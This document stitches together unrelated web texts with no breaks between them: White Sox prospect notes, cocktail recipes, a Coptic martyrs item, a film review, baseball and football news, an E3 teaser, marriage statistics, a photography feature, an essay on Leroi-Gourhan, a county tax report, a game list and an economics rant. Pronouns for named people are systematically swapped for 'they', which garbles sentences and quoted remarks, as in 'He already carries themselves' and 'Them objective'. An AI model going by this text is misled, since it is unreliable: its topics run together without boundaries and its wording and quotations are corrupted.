Tatis Jr., apparently nicknamed “Bebo,” is the son of the Fernando Tatis that you are probably already familiar with. Tatis Jr. is is a well-rounded prospect who can do a bit of everything, but they don't have the big impact tools of a Franklin Reyes type.
Tatis Jr. is currently a shortstop, though most scouting reports indicate a move off the position is likely somewhere down the line. 3B and RF/LF have all been mooted as possible landing spots due to their strong arm, but with raw power that is rated as below average, their bat would probably be a better fit a second. MLB.com and Kiley McDaniel both give Tatis a 50 future grade for their speed and defense while listing them as a SS and a 3B respectively.
At the plate, Kiley McDaniel gives Tatis 45 future grades for both their hit and power tools. MLB.com give them a 50 hit grade and 40 power grade, noting their ability for “barreling up balls and their repeatable swing” as well as their “raw power to their pull side.” Baseball America say that they have “some trouble keeping their swing short and making contact from the right side, but at 6-foot-1, 175 pounds, they have a chance to come into some power.” It sounds like they have decent potential at the plate to be a contributor with both power and average, and it wouldn't be a surprise to see them develop more power and they continue to fill out.
Tatis is noted as having a “game-oriented mindset” with “off the charts makeup” per MLB.com and a “gamer mentality” per Baseball America. Ulises Cabrera, co-founder of the Dominican Prospect League, praised Tatis for their “really good baseball acumen,” their “ability to make some loud contact” and said “He already carries themselves like a professional.”
Tatis clearly doesn't have the same upside as Franklin Reyes, but their well-rounded skillset, high baseball IQ and professional mentality mean they likely comes with less risk than Reyes and is a better bet to maximize their potential as a possible everyday player.
Santo Vasquez, SS, Dominican Republic:
Ben Badler at Baseball America wrote the following about Vasquez:
Vasquez has a compact, 6-foot frame and impressed the White Sox with their ability to hit from the right side of the plate and good speed. They played in the Dominican Prospect League and trained with Hector Evertz.
Harvin Mendoza, OF, Venezuela:
Ben Badler wrote the following about Harvin:
Mendoza is limited to an outfield corner, but there were scouts who liked their lefthanded swing, ability to use the opposite field and hang in well for theirs against lefthanded pitching. They trained at Carlos Guillen's academy.
Using the opposite field and hanging in against lefties both sound like the traits of a prospect with a strong hit tool. Being relegated to a corner outfield spot likely indicates a lack of speed/athleticism, but Badler also noted that Mendoza made an American Championship all-tournament team as a pitcher, so they likely has a strong arm.
Mendoza's bonus is currently unknown, but Badler has previously speculated that it would be "in the $300,000 area."
Brayant (or Bryant) Nova, SS, Dominican Republic:
Ben Badler, again, wrote the following on Nova:
Nova is 16, though they turn 17 on Aug. 28, so while they became eligible to sign last year, they were one of the youngest players in the class, only a week older than some of the players who become eligible to sign in 2015. He's a switch-hitter who could move off the position, but the White Sox liked their bat, especially from the left side. They were represented by Rafael Montero (known as “Spilman”) and Kelvin Nova. They also represented Colombian catcher Jhoandro Alfaro, who signed with the White Sox last year for $750,000.
Want to know right away when we publish a new article? Type your email address in the box and click the "create subscription" button. Our list is completely spam free, and you can opt out at any time.
Celebrate patriotic holidays, like the 4th of July, Labor Day, or Memorial Day, with a fabulous red, white, and blue cocktail. Your guests will love that your alcoholic beverages match the theme of the event. Below you'll find four recipes for creating a signature red, white, and blue shot or cocktail. This 'Red, White, and Blue Sangria' is a crowd favorite!
Red, White, and Blue Sangria
Ingredients:
Strawberries, sliced
Blueberries
Pineapple, cut into star shapes
2 bottles dry white wine
1 cup Triple Sec
½ Cup berry-flavored vodka
½ cup fresh lemon juice
½ cup simple syrup
Combine the ingredients in a large pitcher and stir. Chill in the refrigerator for at least four hours.
July 4th Party Planning
These red, white, and blue cocktails require quick and easy recipes that are perfect for an impromptu party. With text message invitations from Punchbowl, you can plan an entire July 4th BBQ — with everything from cocktails to party supplies — in an hour! Seriously… that fast! First, personalize and deliver 4th of July online invitations via text message. You'll receive RSVPs instantly! Then, order groceries with Instacart, buy party supplies with Party City, and find a playlist on Spotify. It's never been faster to plan a party! Learn more here.
Now, check out these three other cocktail and shot recipes that are perfect for a 4th of July BBQ!
Red, White, and Blue Shot Recipe
Ingredients:
½ ounce Grenadine
½ ounce Peach Schnapps or Vodka
½ ounce Blue Curacao
Slowly pour each ingredient into a shot glass to create a layered effect. Add them in the order listed above.
Non-Alcoholic Patriotic Shirley Temple
Ingredients:
½ cup lemon-lime soda of choice
splash of grenadine (about 3 tbsp)
maraschino cherry for garnish
Mix the soda and grenadine. Pour into a glass filled with ice and garnish with a cherry. So simple!
Red, White, and Blue Cocktail
Ingredients:
2 oz. Hypnotiq
1 oz. Citrus Vodka
lemon lime soda
grenadine
Combine the first two ingredients and a splash of soda. Shake with ice and strain into a highball glass. Carefully pour in a small amount of grenadine. This should fall to the bottom of the glass, creating a nice layered effect. Add a layer of whipped cream on top. Garnish with shaved coconut or white chocolate for an added punch of flavor.
Ready to plan your own summer party? Get started with free online invitations!
The stunning icon here depicts the martyrs and was created by Egyptian American artist Tony Rezk. It appears on the website for the Coptic Orthodox Diocese of Los Angeles.
From Vatican Radio:
The Coptic Orthodox Church has announced that the murder of the 21 Egyptian Christians killed by the so-called Islamic State in Libya will be commemorated in its Church calendar.
Pope Tawadros II announced that the names of the martyrs will be inserted into the Coptic Synaxarium, the Oriental Church's equivalent to the Roman Martyrology. This procedure is also equivalent to canonization in the Latin Church.
Militants of the Islamic State released a gruesome video entitled “A Message Signed in Blood to the Nation of the Cross” in which they released a warning saying they were “south of Rome.” They then proceeded to behead the Christian men, some of whom were seen mouthing the words “Lord Jesus Christ” moments before their death.
Photo
Steven Soderbergh shot “The Girlfriend Experience” over a few weeks last fall, with a relatively low budget, a portable high-definition video camera and a mostly nonprofessional cast. The film's means are modest, not unlike the guerrilla techniques Mr. Soderbergh used in “Che,” but nonetheless “The Girlfriend Experience” has a sleek, tailored look appropriate to its setting, which is the moneyed precincts of Manhattan at the height — and most likely the end — of the recent gilded age. Every frame swims with signs of dearly bought, casually enjoyed luxury as the camera makes its way from high-end boutiques to jewelbox hotels, exclusive restaurants and the cabin of a private plane.
Chelsea (Sasha Grey), the main character — more case study than hero — is not only a consumer of top-of-the line merchandise, keeping a careful ledger of the clothes and accessories they have purchased and worn.  They are also a commodity in this rarefied market, a prostitute whose specialty is alluded to in the title of the movie. They offer their rich clients more than sex with an obliging, pretty young woman. Sometimes there is no sex at all, as when one of them is especially anxious about the collapsing financial system. What they sell instead, or in addition, is a simulation of intimacy.
The first scenes, of Chelsea in the company of a handsome, well-mannered customer, are presented as a kind of optical illusion. For all we know, these two attractive people chatting unhurriedly over dinner, then kissing and sipping wine on the couch before making their way to bed, are lovers of long standing and deep attachment. Only when cash changes hands in the morning do we perceive the transactional nature of the affair.
Up to now Ms. Grey's screen performances have been almost entirely in hard-core pornography, and this professional background, along with their character's profession, adds an aura of titillation to the movie. But “The Girlfriend Experience” is less interested in sex than in money, which is shown to be a far more powerful and dangerous source of obsession, confusion, passion and calculation. The movie follows Chelsea from one encounter to the next, and most of those that are not on the clock might be characterized as business meetings and strategy sessions.
Advertisement Continue reading the main story
They chat with an accountant and also with a curious journalist (played by the New York magazine writer Mark Jacobson), and pays a visit to a creepy sex geek whose Web site rates the services of New York's escorts and who styles themselves the Erotic Connoisseur. (He is played by Glenn Kenny, a film critic and entertainment writer — and thus a cordial screening-room acquaintance of mine — with a combination of grandiose self-regard and theatrical self-disgust that recalls Orson Welles in their Paul Masson wine commercials.) What Chelsea reveals, as they try to refine their marketing strategies and improve their brand, is not that everyone is a whore — equating capitalism with prostitution would be an easy, moralizing route for the film to take — but rather that everyone is hustling, trying to get a bit of leverage in a tough economic climate.
Mark Buehrle drank beer during 2005 World Series game they pitched in
Baseball players have been known to let themselves go in the clubhouse on occasion and pop open a cold one, especially on days when they're not in the lineup. From the mythical stories of Babe Ruth hitting 714 home runs on a steady diet of hot dogs and beer to the more recent tales of players like Jon Lester and also Roger Clemens and Jason Giambi enjoying a brew, we have heard these for years. It is a practice that is purportedly most common amongst starting pitchers enjoying an off-day. Well apparently, Blue Jays lefty Mark Buehrle took the tradition and brought it to the World Series.
Chicago White Sox pitching coach Don Cooper shared the great anecdote with SportsTalk Live on Comcast SportsNet on Monday. Buehrle, then with the White Sox, was the ace of the staff in 2005 and played a key role in their championship run that year. They fired seven strong innings against the Houston Astros in Game 2 of the World Series as Chicago jumped out to a 2-0 series lead. Buehrle probably decided to reward themselves on their day off during Game 3, and that's where things got interesting according to Cooper.
In the midst of a 5-5 deadlock in the 7th inning, Buehrle approached Cooper, styrofoam cup in hand.
“I look in it, there's a beer in there,” Cooper told SportsTalk Live. “It wasn't uncommon for guys on the 2005 staff, the starters when they weren't pitching, to enjoy a cocktail from time to time.”
Buehrle then asked if the team needed them to pitch, to which Cooper replied, “Heck no, we're trying to win this game. We don't want you in it.”
What Cooper didn't envision was that the game would go 14 innings, leaving Buehrle as the last available pitcher for the White Sox. Nursing a two-run lead in the bottom of the 14th, Damaso Marte put the tying run on base and sure enough, Buehrle was summoned to record the final out.
“No telling how many beers they had before that,” quipped Cooper. Nevertheless, Buehrle got Adam Everett to pop out after throwing just three pitches, and they picked up the alcohol-fueled save. In a Game 3 of the World Series to boot. The White Sox would go onto complete the sweep in Game 4 to claim The Commissioner's Trophy.
Buehrle still has nothing on Dock Ellis or even the infamous Barry Bonds pitcher. But even so, the image of Buehrle in the clubhouse, pants unbuckled, getting the call and telling Bobby Jenks “Hold my beer,” is a riot either way.
ORCHARD PARK, N.Y. -- With the Buffalo Bills season' over, coach Doug Marrone has a three-day window to terminate their contract as a result of the team's ownership change, sources told ESPN senior NFL analyst Chris Mortensen.
With a multitude of openings around the NFL, will coach Doug Marrone return to Buffalo? AP Images/Paul Sancya
Whether Marrone has any intention of using the clause, which runs through Wednesday, remains unclear.
At the Bills' season-ending news conference Monday, a question about Marrone's contract was initially blocked by a team spokesperson before Marrone decided to answer the question anyway.
"I can't answer that question," Marrone said. "I will tell you this and my background has been the same and you guys can look into. I do not discuss my contract and that's my rule. I never have and never will."
With five head-coaching vacancies around the NFL as of Monday evening, Marrone would be expected to generate interest should they decide to leave the Bills.
Here is how ESPN NFL Insider Adam Schefter views the situation, from their appearance Monday on Sirius XM NFL Radio with Vic Carucci and Pat Kirwan:
Share. What in the world? What in the world?
Square Enix is revealing a "secret title" at E3 this year, according to an email party invite. The invite describes the IGN-sponsored event as "an E3 party for a secret title from Square Enix." The image shows the Atlantic Ocean, with various countries across the globe blurred. Check out the invite below (with the party details at the bottom removed by us):
Square Enix is hosting an E3 press conference on June 16 at 10am Pacific / 1pm Eastern. No doubt we'll learn more about the unannounced game then. We know for certain IO Interactive is working on a new Hitman game, and a new IP is certainly possible. When contacted for additional information, a Square Enix representative declined to comment.
Exit Theatre Mode
Earlier today, Square Enix unveiled a new trailer for Rise of the Tomb Raider. Watch it here. We've got a full list of rumored and confirmed titles at E3 with IGN's Games of E3 list. What do you think it could be? Let us know your theories in the comments below.
For more on Square Enix's press conference, check out Game Scoop! above to learn why we're excited about this briefing.
Full disclosure: IGN's Editorial team and IGN's event organizers operate independently. As such, IGN Editorial has no insight into the event, its organizers, or the project partnership.
Mitch Dyer is an Editor at IGN. They host IGN Arena, a podcast about MOBAs. Talk to Mitch about Dota 2, movies, books, and other stuff on Twitter at @MitchyD and subscribe to MitchyD on Twitch.
Here are some interesting marriage statistics, and also an announcement about the next HUS movie discussion.
First, check out this wedding photo. It's courtesy of Daisy Beatty, a longtime HUS reader and full-time photographer who works out of NYC. I plan to feature more of their work in future posts.
They have taken incredible photographs of weddings, pregnancy and families – they're amazing! Check out their work here:
Marriage Age Statistics
We know that today people are getting married later than in previous decades. We also know that socioeconomic status predicts both the occurrence of marriage and its likelihood of success. It can be confusing to interpret all the data and make sense of it on a personal level. So when I see a nice, clear graph I like to share:
This is for the whole population – not broken out by gender, education level, etc. Still it's a dramatic presentation of trends over the last 50 years.
Key points:
1. The percentage of married 20 year-olds has gone from nearly 40% to about 15% – I think we can agree that this is a good thing.
2. Just over half of the population is married by age 30.
3. The married percentage jumps from about 55% to 72% between the ages of 30 and 35.
4. From ages 35-40, growth in the marriage rate slows dramatically.
5. 80% of 40 year-olds have married – for the college educated that number is bound to be much higher.
Key Points:
1. Nearly everyone marries. This does not speak to the quality of relationships, but fears that one will never marry, even in one's 40s or later, are usually overblown.
2. Age 59 is where the intact first marriage and failed first marriage groups are about the same size, representing 42% of the population. Keep in mind that the red line includes successful second+ marriages.
3. The widowed population really takes off around age 65.
All in all, what these marriage statistics say to me that an educated single person should not feel stressed out about finding a partner in their 20s. That may be ideal for other reasons. But the idea that a woman hits the wall at 30 is ridiculous – and certainly not borne out by the data.
In my view, you're much better off taking your time to choose a partner carefully, and should resist any urge to settle for someone you're not crazy about for fear of never finding “the one.” I believe that even in mating, we make our own luck.
HUS Movie Discussion
The next movie discussion will take place next Monday, June 22. Continuing from our last discussion of Before Sunrise, we'll do Before Sunset this time.
A sequel to “Before Sunrise,” this film starts nine years later than Jesse (Ethan Hawke) travels across Europe giving readings from a book they wrote about the night they spent in Vienna with Celine (Julie Delpy). After their reading in Paris, Celine finds him, and they spend part of the day together before Jesse has to again leave for a flight. They are both in relationships now, and Jesse has a son, but as their strong feelings for each other start to return, both confess a longing for more.
Before Sunset received the same warm critical appraisal as its predecessor and has a 95% favorable rating at Rotten Tomatoes. New York Times film critic A.O. Scott has called the trilogy “The great romantic epic of a generation.”
In an effort to both allocate space for and document the existence of masculine women, photographer Meg Allen created a powerful series of portraits for an exhibit at Cafe Gabriela in Oakland, Calif.
Entitled BUTCH, Allen's series not only represents genderqueer women for a broader, heteronormative audience, but reaffirms butch identity within the queer community at a time when "butch flight," or gender transitioning, is arguably becoming more and more commonplace. It is, as Allen says on their website, "an homage to the bull-daggers and female husbands before me, and to the young studs, gender queers and bois who continue to bloom into the present."
Pioneering queer theorist and historian Gayle Rubin asserted in their 1992 essay "Of Calamites and Kings: Reflections on Butch, Gender, and Boundaries" that butch identity, the interplay "of masculine traits with a female anatomy," varies depending upon the individual embodying that identity and each individual's socio-economic, racial and ethnic reality "to adopt and transmute the many available codes of masculinity."
Even the New Statesman asked, "Do we need a better word for 'butch'?" proposing that "masculine-of-center" be used in lieu of the maligned, culturally "irrelevant" term. But do we really need to flee from the "butch label"? Through their photographs, Allen has attempted to get the heart of "what a [lesbian looks] like now."
A self-described "butchish hapa queer chick," Allen took their inspiration from acclaimed queer artists like Catherine Opie and Del LaGrace Volcano. Them objective is to expand the series for publication when they reach 117 portraits — the same number of portraits in Annie Leibovitz's Women. Allen's photography project finds a compliment, too, in the recently published Butch photo book by Kanithea Powell.
Despite a growing acceptance of the butch, or at the very least androgynous look, people still have problems when gender binary is visibly challenged, Allen told PolicyMic, especially "the seemingly inextricable link of masculine to male."
"Masculinity is a trait, not a gender," Allen told PolicyMic, referencing a particularly striking portrait featuring a pregnant couple. "I think viewers are really drawn to the pregnancy picture because of that illustration."
But ultimately, Allen said, their project is about the amazing diversity of this community.
"For all my portraits, I really wanted to show the vast variety of butch women and how different they are all from one another," Allen told PolicyMic. "The thread is the innate female masculinity, but just like anything, butch has its spectrum.
"I find more the younger generation of butches are way more comfortable with the idea that they can be super masculine-presenting but also be very comfortable with the very female bodies that they have."
Artifice and art itself – these are the two meanings of the Greek word technē. Technē is, according to French philosopher, Bernard Stiegler, and according to the myth of Prometheus and Epimetheus, the defining characteristic of man. There is no man without technics; and there is no technics without man.
This idea of ‘technics' is supposed to comprise both techniques for making things, and the technical products of those techniques. The word ‘technics' also equivocates between modern machine technology and primitive ‘tools' and their techniques, whether they were turned towards art or craft – things we wouldn't necessarily think of as ‘technology'.
In the first part of Man, The Animal Without Essence I focused on the myth of Prometheus and Epimetheus, in the second part I looked at Plato's cave allegory in relation to prehistoric art and Werner Herzog's Cave of Forgetting Dreams. So what I want to do in this third part is justify and illustrate the idea that man and technics arise at exactly the same moment. One of the chief in this regard was the twentieth century palaeoanthropologist, André Leroi-Gourhan (palaeoanthropology being the study of the oldest (palaiós) forms of the human being (anthrōpos).)
What Leroi Gourhan shows us is two extraordinary things: 1. techniques have a history. From the most simple things about prehistoric tools, such as flints, we can say something about the level of historical development the people of that time had reached. And we can say something about how intelligent they were. There is a direct correlation between the type of tools people were capable of making, and their brain. The two ‘mirror' one another, so to speak. The evolution of man and the evolution of the tool run side by side. 2. There IS no human being properly speaking, that does not use tools i.e. there is no ‘man' without technics (hence the title of this series).
Change in posture before development of brain: from quadripedal to bipedal
Leroi-Gourhan begins their book, Gesture and Speech, (1964) by opposing a very long tradition in palaeontology: the idea that the evolution, the development of the human being is governed by the brain. Everything else, its posture, skeleton, and physiology generally, results from the gradual increase in size of the animal's brain.
In fact, as Leroi-Gourhan tries to show, everything begins with the feet. With the posture and the skeleton of the animal, and the way that this changes over the course of time. One change in posture in particular is crucial: the move from the four-footed (quadripedal) stance to the two-footed (bipedal) stance.
This has the effect of freeing up or liberating a number of different parts of the animal (by liberating I mean that it makes possible certain novel functions that will come to be assumed by certain organs, and secondly I mean the freeing up of the movement of the individual appendages, making them more mobile). So what were these liberations, these changes in function and mobility, that occurred with the assumption of an upright stance?
First of all, the front limbs of the animal were freed from task of walking, this freed up the hand and thus bestowed upon it the possibility of grasping things, like tools, as well as gesturing. Now, because the hand was now given the possibility of grasping things, the MOUTH was simultaneously freed from this task – the task of grasping and picking up – it is now free to SPEAK. (It's hard to grip tools if you have to run with your hands at the same time; and it's hard to speak with a dead rat in your mouth!)
Hence, two significant things are liberated in the move from the quadrupedal to the bipedal stance: the hand and the face; gesture and speech. Effectively the new erect stance opens the way to two essential human characteristics: the use of tools, and the use of speech.
But there is a third consequence of the upright stance, and that is an increased space in the skull for the brain. In four-footed animals, the spine enters the skull at the rear, and given the angle of entry, and given the low flat skulls that such animals must have (for reasons of weight-bearing and mechanical stress), the spine and the shape of the skull leave precious little room for a brain.
Now with the assumption of an erect posture, the spine enters the skull at the base, and given the way that this supports the weight of the skull, and the amount of space left free at the top, front, and rear of the skull, this opens up space, a space in which a much larger and more complex brain can evolve:
We therefore have three effects of the upright stance: hand, face, and brain.
So to Leroi-Gourhan, humans do have bigger brains than their cousins, but crucially, this brain did not come first and initiate the development of the other two: the empty space in the skull came first, and that empty space was the result of a prior change in posture and skeleton.
One of the crucial discoveries for Leroi-Gourhan – and for all palaeoanthropology – was the discovery of a primitive man known as the Zinjanthropian, or Zinjanthropus, in 1959. Given that Gesture and Speech was completed a mere 5 years later, one can imagine that this discovery was one of Leroi-Gourhan's main inspirations for writing the book. The Zinjanthropian was perhaps the very first human: they had plenty of room in their skull for a large brain, but they had only a tiny one. And what is even more crucial about this man was that, despite this tiny brain, they nevertheless used tools. As Leroi-Gourhan puts it: ‘The discovery of Zinjanthropus has taught us that technicity is present even in the most rudimentary of human forms' (GS83).
‘Perhaps the most important development of the science of fossil man was Leakey's find on July 17th, 1959, in the Olduvai Gorge in Tanganyika, of Zinjanthropus boisei accompanied by very primitive but unmistakably human-made tools' (89) – ‘chipped pebbles. These form part of an industry that had long been known in Africa under the name of “pebble culture” (90):
Therefore, the use of tools could not be a consequence of an extremely well developed brain. Rather, the development of more and more sophisticated tools occurred simultaneously with the progressive development of the brain, as Leroi-Gourhan tries to show by looking at the history of tools alongside the history of the human skeleton and its brain. And what they are able to then show is that the history of technics and the history of the human being run parallel with one another; they are, if not the same, at least inextricable.
So, when Stiegler recapitulates Leroi-Gourhan's analyses, they speak of the tool outside and the brain inside ‘mirroring' one another. Their development and their respective histories reflect one another. In part 4 I will examine this fascinating idea by looking at the development of cutting tools made out of stones -flint and quartzite- and what the developing technical procedures for MAKING these tools tells us about the brain of the human beings who made them.
Adapted and expanded from a lecture given by Dr. Mike Lewis at the University of the West of England by Matt Bluemink
Part One: Man, The Animal Without Essence
Part Two: Fire and the Cave
Part Four: The Edge of Time
People who go out for dinner or grab a drink in Monroe County will pay a 1 percent food and beverage tax starting in February.
After five hours of public comment and discussion, the county council voted 4-3 Wednesday night to pass the tax. It will fund a long-awaited expansion of the county convention center.
The $35 million expansion itself wasn't controversial, but residents and county leaders disagreed on how the project should be funded.
Related: Tune into WFIU on Friday, Dec. 15 at noon for a live discussion about the future of the convention center.
Several Indiana University students spoke out against the proposal, arguing they would be disproportionately impacted.
“Students don't have any extra money,” says Emma Coates, Speaker of Congress for the IU Student Association. “Many of them have thousands of dollars in student loans they have to worry about paying for. So, if you want to renovate your convention center, don't put that burden on us.”
Others say the tax is regressive and will make food insecurity an even bigger issue for those with low wages. William Ellis is chair of the Monroe County Republican Party. They say the tax could be bad for some businesses, too.
“What's going to happen, they're going to have the same exact amount of people going through their drive thru,” Ellis says. “So, next thing, oh they're a little short of money, so instead of getting the double, they'll get the single. Doesn't sound like much, but you're going to have less of an average check or dollar amount [per] order.”
But several local business owners spoke in favor of the proposed tax.
“I feel that tourism can really help support the restaurants downtown,” says Susan Bright, who owns Nick's English Hut.
.@MayorHamilton is now speaking in favor of proposed tax. — Barbara Brosher (@BabsofBtown) December 14, 2017
Some in opposition holding these signs up as they speak. pic.twitter.com/FhTuUS4l0v — Barbara Brosher (@BabsofBtown) December 14, 2017
Many supporters of the measure pointed to the potential for additional economic development and job growth the county could see as a result of the expanded convention center.
“I think the proposed 1 percent tax is a modest and manageable investment on the part of residents into one of our most important community resources,” says Matt Alano-Martin, co-founders of Limestone Comedy Festival. “An investment that will not only show economic returns for the county, but also an expanded ability to serve the interests and needs of its population.”
The meeting went on for five hours before the council took a vote.
Council members Lee Jones, Marty Hawk and Eric Spoonmore voted against the proposal.
Jones says it felt like Monroe County residents were being asked to pay tax on a necessity in order to fund an amenity. They say she's generally against food taxes because they limit choices for those struggling.
Hawk worried about the potential for the expansion to fall through or cost more than originally projected. They wanted language added to the ordinance that stipulates the council will revisit the issue in the future and revoke the tax if it isn't being used to fund the convention center expansion. The ordinance stipulates revenue from the tax will go toward funding the convention center, or other economic development and tourism-related investments. But Hawk never made a motion to amend the ordinance.
Spoonmore says they wanted more time to explore other possible funding mechanisms, such as raising the innkeepers tax.
The vote approving the tax is essentially the first major step in making the convention center expansion a reality. The county is working with Indianapolis-based Sun Development on the project. Sun will build a $37 million, 224-room Embassy Suites hotel as part of the agreement. The expansion will be built across the street from the current convention center, on land the county purchased in 2010.
Money generated from the tax outside of Bloomington city limits will be used for economic and tourism-related investments in Monroe County.
The food and beverage tax goes into effect Feb. 1.
I'm a details man. I like to stop and check out the small things, to drink in my environments, and to notice how all sorts of elements connect (or not). In MMORPGs, I often find myself stumbling to a halt while I investigate some strange sight or find a perfect moment for a screenshot. For me, it's not just the big set pieces that are impressive, but also the small touches that add unappreciated depth to the world.
When you've been in a game world for a long time, you pick up on many of these details and have them ingrained into your subconsciousness. I've been playing Lord of the Rings Online since launch, and even today there are still parts of that game that charm the pants off of me (which is not a pretty sight, so I'll thank you to eject it from your imagination). And I'm forever noticing the little things that don't get much attention in press release bullet points but are just as important to me when it comes to the full experience.
So why not, here is a list of 10 little things that I love about LOTRO. Minute and inconsequential as they may seem, they're still important to me.
1. Auto-looting
I forget which update added the auto-loot function, but it was one of the most wonderful changes to any MMOs that I've ever played. I mean, who really enjoys having to run around like a macabre scavenger after fights, clicking on sparkly corpses to get their hard-earned loot? LOTRO finally said, “Forget that!” and just dumped all booty in our bags once a mob was killed. Not having to constantly stop to loot made the experience feel more smooth and enjoyable.
2. Dark clouds and dread effects
Ever since launch day, LOTRO has had an interesting set of tools to show when evil was encroaching and your character was deeply terrified. In some of Middle-earth's more troubled areas, dark clouds would roll in over the sky when you crossed an invisible boundary, and if your character was especially scared, the color would bleed out of the visuals and the sides of the screen would start becoming hazy and indistinct. I've always liked this, because it communicated emotion and danger in a way that is hard to do otherwise.
3. The quiet, ambient tunes
Everyone always harps on (pun intended) LOTRO's generally excellent soundtrack. And while the main pieces are enjoyable, I've noticed that there are a set of much quieter and more ambient tracks that play between them in zones. They've always contributed greatly to the questing experience and weave in great with the ambient sounds of nature and fantasy life.
4. Freeze tag
Another odd little staple of the game that stretches back to launch day, in the ruins near the Bree-land festival grounds is a sort of social mini-game that allows players to engage in actual freeze tag. There are no achievements and no rewards, but it's kind of fun all the same and a fun option for kinships looking to get together for some mischief.
5. Festival centerpieces
Practically each one of the game's seasonal festivals are accompanied by at least one significant activity that serves as that event's centerpiece. Whether it be Bilbo's haunted burrow, the giant hedge maze, shrew stomping, or the interactive theater in Winter-home, I've always been impressed with the creativity involved in these activities. Oh sure, they all get a little stale when you've done them a thousand times, but it's great that they're there.
6. Pipe smoking
I'm not a smoker in real life, but there's something so perfect about LOTRO allowing players to grow and smoke their own “pipe-weed.” It feels old-fashioned and part of the culture, and roleplayers especially appreciate that option to do something while standing around and gabbing in character. Plus, there are different smoke ring effects!
7. The archaic writing
Tolkien's novels were intentionally written with a more archaic-sounding language than people used at the time, and compared to modern fantasy works, The Lord of the Rings can come off as downright old-fashioned. But that, I'd argue once again, is part of its overall charm, and the game writers do an excellent job creating mountains of quest text and dialogue that fits in with this IP instead of trying to sound like a PG Game of Thrones.
8. Emotes
As I hinted at before, LOTRO has a really strong roleplay community, but even those of us that aren't always “in character” do seem to appreciate the array of RP tools at our disposal. I am amazed how many emotes are in the game, with many of them needing to be earned through various deeds or festivals. And more and more as the years have gone on, I've seen the devs weave in emotes as part of the quest system. It's kind of neat to see your character actually perform gestures that go along with what's happening in the story.
9. Cosmetic weapons
Oh man, how wonderful is this feature? For years and years, players beseeched the devs to add a cosmetic option for weapons in the same way as LOTRO had for outfits, and relatively recently, it was added. For those of us who truly disliked the tacky legendary item appearances, being able to sport the look of the weapon you liked was a delightful present. I actually enjoy having my Lore-master wield a natural-looking wood stave that I got back around level 10 instead of some elaborate king's ephod.
10. Details from the novels
If you never read the books or are only passingly familiar with the Middle-earth franchise, you can still enjoy LOTRO for what it is. But there's an added layer of fun for those who are intimately familiar with the novels, because the game devs are forever putting in all sorts of details straight out of the books that wouldn't be noticed unless you really went looking for them. It's not a 100% faithful adaptation, but it's far more accurate than any Tolkien scholar could hope to see in a video game adaptation.
People quickly forget about the nearly 1,000 point “flash crash” brought on by glitches in the Wall Street casino machinery. Still no sensible explanation has been given but today the stock market now stands below the flash crash moment. The middle class is witnessing the largest wealth transfer in history take place and it is all happening because of the Wall Street infrastructure and the government's lack of respect for the working class of the United States. Even last month as we lost 125,000 workers the unemployment rate actually went down because over 500,000 Americans simply dropped out of the workforce. In other words people simply threw their hands up in exhaustion and gave up. The government is literally not counting tens of thousands of Americans. What does this tell you about how much they value the middle class?
Let us break down some income data first:
47 percent of American households make less than $50,000 a year. 66 percent make less than $75,000. This should give you a sense of the household income in the U.S. Only 4.3 percent of U.S. households make more than $200,000. Income for working and middle class Americans has remained stagnant for one agonizing decade. What has occurred over this time is the artifacts of a middle class lifestyle like a decent home and a college education have been juiced with massive amounts of banking debt. As banks have tried to put their hands on every aspect of American life, prices have zoomed up in every industry they have jumped into. Look at housing and higher education for dramatic examples. 50 years ago most middle class Americans could afford a college education and a starter home without sacrificing every single penny to servicing debt.
Debt has engulfed our nation. If we look at personal consumption as a percent of GDP we can start seeing where problems started:
Personal consumption makes up over 70 percent of our GDP. Banks love using this figure to beat on middle class Americans to blame them for the problems in the current recession. Keep in mind that the above chart also includes giant increases in health care costs and also, large piles of cash going to service debt that banks are so happy to take. Yet the above point of the chart does hold steady. That is, we have gone from producing to spending too much as a nation. It is fun while things are good but is definitely unsustainable. And don't think this spending came from actual savings:
The drop in personal savings is incredible. As we went negative for a short period of time, banks were capitalizing by allowing people to spend more money than they actually had. If we look at the trillions of dollars given out to banks that made poor bets in the last decade, we'll see that they are also the largest players in the credit card game:
Source: Reuters
The above chart is basically the too big to fail. They have fed massive amounts of credit cards into the system with little due diligence since they knew in the end, taxpayers would bail them out. Now that things have gotten bad (not for too big to fail banks since they have gotten the ultimate gold plated bailouts) they are now crunching down on the middle class. High interest charges, onerous fees, and other trickery are merely ways of sucking real wealth from those who work to a class that is largely unproductive and has led us into this economic predicament. The government has worked hand in hand with the banks here.
Credit card debt eats up a large portion of annual household income for millions:
Much of what we consider to be middle class living has been kept on life support by banking debt. Yet no system can go on forever with too much debt and too little production. Banks have become a dangerously large part of our economy. That is why so much focus is given to Wall Street and the banking sector. It is a largely idle industry that merely attempts to suck off the wealth creation of actual real work. The housing bubble was the pinnacle of banking neurosis. The idea that you can simply repackage toxic mortgages into “sophisticated” debt products and sell them off as diamonds to unsuspecting fools is appalling. Yet in most cases, all this was legal because our Senators write the laws that should be protecting us. Instead, they have allowed Wall Street to control every aspect of finance and now here we are with 40 million Americans on food assistance and a close to 17 percent unemployment and underemployment rate. Yet things are getting better for the middle class?
The current system is not capitalism but a form of state sponsored cronyism for banks. Most of us can understand that if you have a good product then by all means make a profit. This is the essence of any small business and their survival. But the banking system operates under perverse rules. They created inordinate amounts of debt products that serve no purpose and assured destruction of those taking on the product. Think of option ARMs that actually grew the balance of the mortgage! Horrible products that have destroyed large portions of the real economy and have pushed many off the middle class path. How many foreclosures could have been avoided over the past decade with more prudent banking? Yet this isn't what the system wants. Banks wouldn't mind if all you did was work and had to open your beat up leather wallet and pull out 99.99 percent of your net pay to service your debt. In fact, this is probably their ultimate wish.
Where do people spend their money?
Source: BLS
Housing by far is the largest line item above. Yet categories like medical care and education are growing at rates that outpace the overall rate of inflation. Ironically these are areas that are favorites of Wall Street. As long as you can slap a loan onto something, the big investment banks will be there drooling over every penny they can tack on.
There was a time when paying off your mortgage was a good thing. We have a good number of Americans who own their home mortgage free:
Over 30 percent of homeowners in the U.S. own a home with no mortgage. Yet these are typically people from an era that allowed them to pay down their mortgage even with a modest income. How likely is it that someone in say a state like California who bought a home at $500,000 with a $70,000 income is going to pay off that home? They're not going to do it so that is why in the chart above you see distress levels off the charts.
Even if we look at current metrics for 3 of the largest states, we find that debt is not necessarily a good thing:
